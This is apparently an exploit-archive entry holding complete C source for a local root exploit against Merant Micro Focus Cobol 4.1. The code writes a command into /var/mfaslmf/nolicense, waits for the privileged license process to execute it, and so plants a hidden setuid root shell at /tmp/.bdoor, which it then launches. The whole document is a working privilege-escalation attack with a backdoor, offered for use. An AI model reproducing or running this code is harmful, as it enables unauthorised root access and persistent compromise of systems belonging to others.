Merant Micro Focus Cobol 4.1 local root exploit - Writes to /var/mfaslmf/nolicense.
b3e6feb09ab94e71a3134d21b92fbc379b90d55ded65c2e679fcd15a4ef25b91
/*
exploit for...Merant Micro Focus Cobol 4.1
Cherrios!
sagi
------------------
www.idiotbox.co.il
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>
char evilcode[] = "/bin/cp /bin/sh /tmp/.bdoor; chmod 4755 /tmp/.bdoor";
struct stat buf;
int snot, funk;
FILE *fp;
main(){
if( (fp = fopen("/var/mfaslmf/nolicense", "w+")) == NULL)
{
printf("couldnt access /var/mfaslmf/nolicense \n\a");
exit(1);
}
if (fputs(evilcode, fp) == EOF)
{
printf("couldnt insert string into /var/mfaslmf/nolicense \n\a");
exit(1);
}
fclose(fp);
if(stat("/var/mfaslmf/nolicense", &buf) == -1){
printf("error\n\a");
exit(1);
}
else { snot = buf.st_atime;
funk = buf.st_atime; }
printf("################################################\n");
printf("# Waiting for /var/mfaslmf/nolicense to be used.\n");
printf("# This could take hours, days , maybe months...\n");
printf("# Enjoy! =)\n");
printf("#;... \n");
do {
if(stat("/var/mfaslmf/nolicense", &buf) == -1) {
printf("error\n\a");
exit(1);
}
else {
funk = buf.st_atime; }
}
while ( funk == snot);
if (funk != snot) {
printf("Access Granted!\a\a\a\a\n");
system ("/tmp/.bdoor");
}
}